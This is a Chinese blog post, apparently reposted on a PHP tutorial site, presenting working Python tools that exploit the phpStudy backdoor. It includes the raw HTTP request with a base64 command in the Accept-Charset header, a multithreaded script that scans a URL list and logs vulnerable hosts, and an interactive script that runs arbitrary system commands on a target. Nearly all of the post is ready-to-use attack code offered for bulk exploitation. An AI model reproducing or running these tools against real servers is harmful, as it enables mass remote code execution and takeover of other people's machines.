编程 PHP

phpstudy后门rce批量利用脚本的实现

Posted in PHP onDecember 12, 2019

写两个一个批量检测的一个交互式shell的

暂时py 图形化的qt写出来..有点问题

后门包 :

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

phpstudy后门rce批量利用脚本的实现

执行那段写shell即可

phpstudy后门rce批量利用脚本的实现

晚上抽点空简单写个发包的py:

phpstudy后门rce批量利用脚本的实现

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import queue


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")
payload = "echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}



def write_shell(url,headers):
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

url = "http://xxx"
write_shell(url=url,headers=headers)

界面优化、改下多线程、批量读取文本文件后的代码:

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")




def write_shell(url):
  payload = "echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

# url = "http://xxx"
# write_shell(url=url,headers=headers)

def main():
  with open('url.txt','r') as f:
    lines = f.read().splitlines()
    task_pool=threadpool.ThreadPool(5)
    requests=threadpool.makeRequests(write_shell,lines)
  for req in requests:
    task_pool.putRequest(req)
    task_pool.wait() 
if __name__ == '__main__':
  main()


#线程队列部分
# th=[]
# th_num=10
# for x in range(th_num):
#     t=threading.Thread(target=write_shell)
#     th.append(t)
# for x in range(th_num):
#     th[x].start()
# for x in range(th_num):
#     th[x].join()

phpstudy后门rce批量利用脚本的实现

你也可以加上读取php文件的字典这个简单没啥说的

下一个是交互式shell

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool
import re

print("======Phpstudy Backdoor Exploit---os-shell============\n")
print("===========By Qing=================\n")
print("=====Blog：https://www.cnblogs.com/-qing-/==\n")



def os_shell(url,headers,payload):
  try:
    r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
    # print(r.text)
    res = re.findall("qing(.*?)qing",r.text,re.S)
    print("[ + ]===========The Response:==========[ + ]\n")
    res = "".join(res)
    print(res)
  except:
    print("[ - ]===========Failed! Timeout...==========[ - ]\n")

def main():
  url = input("input the Url , example:\"http://127.0.0.1/\"\n")
  payload = input("input the payload , default:echo system(\"whoami\");\n")
  de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"
  if payload.strip() == '':
    payload = de_payload
  payload = "echo \"qing\";"+payload+"echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
  }
  os_shell(url=url,headers=headers,payload=payload)
if __name__ == '__main__':
  main()

phpstudy后门rce批量利用脚本的实现

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持三水点靠木。

phpstudy后门rce批量利用脚本的实现

- Author -

卿先生

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php批量删除数据

Jan 18 PHP

不错的一篇面向对象的PHP开发模式（简写版）

Mar 15 PHP

Godaddy空间Zend Optimizer升级方法

May 10 PHP

PHP 调试工具Debug Tools

Apr 30 PHP

PHP语法自动检查的Vim插件

Aug 11 PHP

Symfony页面的基本创建实例详解

Jan 26 PHP

Zend Framework动作助手Json用法实例分析

Mar 05 PHP

深入理解PHP之源码目录结构与功能说明

Jun 01 PHP

php性能分析之php-fpm慢执行日志slow log用法浅析

Oct 17 PHP

ThinkPHP使用getlist方法实现数据搜索功能示例

May 08 PHP

PHP实现json_decode不转义中文的方法

May 20 PHP

laravel实现前后台路由分离的方法

Oct 13 PHP

PHP设计模式之数据访问对象模式（DAO）原理与用法实例分析

Dec 12 #PHP

PHP设计模式之建造者模式（Builder）原理与用法案例详解

Dec 12 #PHP

PHP设计模式之适配器模式（Adapter）原理与用法详解

Dec 12 #PHP

PHP学习记录之常用的魔术常量详解

Dec 12 #PHP

记Laravel调用Gin接口调用formData上传文件的实现方法

Dec 12 #PHP

PHP命名空间(namespace)原理与用法详解

Dec 11 #PHP

在 Laravel 6 中缓存数据库查询结果的方法

Dec 11 #PHP

You might like

论建造顺序的重要性

2020/03/04 星际争霸

强烈推荐：php.ini中文版(2)

2006/10/09 PHP

如何在PHP中使用Oracle数据库(5)

2006/10/09 PHP

用ODBC的分页显示

2006/10/09 PHP

PHP中include与require使用方法区别详解

2013/10/19 PHP

PHP7之Mongodb API使用详解

2015/12/26 PHP

使用composer命令加载vendor中的第三方类库的方法

2019/07/09 PHP

Yii框架操作cookie与session的方法实例详解

2019/09/04 PHP

jQuery1.6 正式版发布并提供下载

2011/05/05 Javascript

treepanel动态加载数据实现代码

2012/12/15 Javascript

你必须知道的Javascript知识点之"单线程事件驱动"的使用

2013/04/23 Javascript

javascrip关于继承的小例子

2013/05/10 Javascript

jquery索引在使用中的一些困惑

2013/10/24 Javascript

JavaScript极简入门教程（一）：基础篇

2014/10/25 Javascript

JavaScript实现简单的二级导航菜单实例

2015/04/15 Javascript

JS版元素周期表实现方法

2015/08/05 Javascript

深入解析JavaScript中的数字对象与字符串对象

2015/10/21 Javascript

jQuery基于正则表达式的表单验证功能示例

2017/01/21 Javascript

使用gulp搭建本地服务器并实现模拟ajax

2017/04/05 Javascript

vue.js中v-on:textInput无法执行事件问题的解决过程

2017/07/12 Javascript

基于VUE移动音乐WEBAPP跨域请求失败的解决方法

2018/01/16 Javascript

微信公众号开发之微信支付代码记录的实现

2019/10/16 Javascript

Vue包大小优化的实现(从1.72M到94K)

2021/02/18 Vue.js

Python Multiprocessing多进程使用tqdm显示进度条的实现

2019/08/13 Python

Python3 pandas 操作列表实例详解

2019/09/23 Python

Python箱型图绘制与特征值获取过程解析

2019/10/22 Python

opencv3/C++实现视频读取、视频写入

2019/12/11 Python

python global和nonlocal用法解析

2020/02/03 Python

解决pycharm每次打开项目都需要配置解释器和安装库问题

2020/02/26 Python

Python self用法详解

2020/11/28 Python

印尼综合在线预订网站：Tiket.com（机票、酒店、火车、租车和娱乐）

2018/10/11 全球购物

说一下mysql, oracle等常见数据库的分页实现方案

2012/09/29 面试题

医院护士见习期自我鉴定

2014/09/15 职场文书

工作失职造成投诉的检讨书范文

2014/10/05 职场文书

2014年药房工作总结

2014/11/22 职场文书

浅谈Redis在直播场景的实践方案

2021/04/27 Redis